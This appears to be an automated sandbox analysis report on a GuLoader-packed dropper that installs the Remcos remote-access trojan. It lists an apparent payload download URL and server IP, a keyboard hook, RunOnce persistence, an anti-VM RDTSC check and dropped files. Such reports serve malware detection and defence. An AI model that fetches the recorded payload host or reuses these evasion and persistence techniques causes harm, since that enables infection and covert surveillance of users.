              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, Vaskegthed.exe.4.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, Vaskegthed.exe.4.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bdias.com/
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp, IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bdias.com/zjMSeQNkb41.bin
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bdias.com/zjMSeQNkb41.bin/
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bdias.com/zjMSeQNkb41.bin2
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownHTTPS traffic detected: 91.196.125.125:443 -> 192.168.2.4:49737 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeCode function: 0_2_0040550F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040550F

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000004.00000002.2910026299.00000000354EE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2890396068.0000000004F17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2890485500.0000000004F49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe PID: 1076, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeCode function: 0_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033D8
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeCode function: 4_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004033D8
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeCode function: 0_2_004072D10_2_004072D1
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeCode function: 0_2_00406AFA0_2_00406AFA
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeCode function: 0_2_6E331B280_2_6E331B28
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeCode function: 4_2_004072D14_2_004072D1
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeCode function: 4_2_00406AFA4_2_00406AFA
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll 014F1DFEB842CF7265A3644BC6903C592ABE9049BFC7396829172D3D72C4D042
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeCode function: String function: 00402C5E appears 52 times
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebromhidrosis fasteres.exe4 vs IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000000.2053154636.0000000000443000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebromhidrosis fasteres.exe4 vs IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exeBinary or memory string: OriginalFilenamebromhidrosis fasteres.exe4 vs IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/14@8/2
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeCode function: 0_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033D8
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeCode function: 4_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004033D8
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeCode function: 0_2_004047BF GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004047BF
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeCode function: 0_2_00402198 CoCreateInstance,MultiByteToWideChar,0_2_00402198
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeFile created: C:\Users\user\AppData\Roaming\chlorenchymaJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-3DX9QW
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeFile created: C:\Users\user\AppData\Local\Temp\nsr488B.tmpJump to behavior
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exeReversingLabs: Detection: 28%
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exeVirustotal: Detection: 16%
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeFile read: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe "C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeProcess created: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe "C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeProcess created: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe "C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"Jump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: 00000000.00000002.2056638671.000000000433E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeCode function: 0_2_6E331B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6E331B28
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeFile created: C:\Users\user\AppData\Local\Temp\subfolder1\Vaskegthed.exeJump to dropped file
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeFile created: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeAPI/Special instruction interceptor: Address: 4645339
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeAPI/Special instruction interceptor: Address: 1B25339
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeRDTSC instruction interceptor: First address: 45E1793 second address: 45E1793 instructions: 0x00000000 rdtsc 0x00000002 cmp bx, dx 0x00000005 jmp 00007F6064C2CF2Fh 0x00000007 cmp ebx, ecx 0x00000009 jc 00007F6064C2CEDEh 0x0000000b cmp eax, ebx 0x0000000d inc ebp 0x0000000e test cl, al 0x00000010 inc ebx 0x00000011 test edi, 0EBC10DBh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeRDTSC instruction interceptor: First address: 1AC1793 second address: 1AC1793 instructions: 0x00000000 rdtsc 0x00000002 cmp bx, dx 0x00000005 jmp 00007F6064DE03DFh 0x00000007 cmp ebx, ecx 0x00000009 jc 00007F6064DE038Eh 0x0000000b cmp eax, ebx 0x0000000d inc ebp 0x0000000e test cl, al 0x00000010 inc ebx 0x00000011 test edi, 0EBC10DBh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeWindow / User API: threadDelayed 3344Jump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe TID: 4504Thread sleep count: 3344 > 30Jump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeThread sleep count: Count: 3344 delay: -5Jump to behavior
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeCode function: 0_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A4F
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeCode function: 0_2_00406620 FindFirstFileA,FindClose,0_2_00406620
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeCode function: 0_2_004027CF FindFirstFileA,0_2_004027CF
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeCode function: 4_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_00405A4F
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeCode function: 4_2_00406620 FindFirstFileA,FindClose,4_2_00406620
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeCode function: 4_2_004027CF FindFirstFileA,4_2_004027CF
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp, IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004F3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeAPI call chain: ExitProcess graph end nodegraph_0-4729
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeAPI call chain: ExitProcess graph end nodegraph_0-4878
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeCode function: 0_2_6E331B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6E331B28
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeProcess created: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe "C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"Jump to behavior
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890485500.0000000004F49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890485500.0000000004F49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerD
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890485500.0000000004F49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerO
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890485500.0000000004F49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQW\
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890485500.0000000004F49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageri
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890485500.0000000004F49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager]
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp, IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890485500.0000000004F49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerY
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp, logs.dat.4.drBinary or memory string: [Program Manager]
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeCode function: 0_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033D8

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000004.00000002.2910026299.00000000354EE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2890396068.0000000004F17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2890485500.0000000004F49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe PID: 1076, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              Remote Access Functionality

              barindex
              Detected Remcos RAT
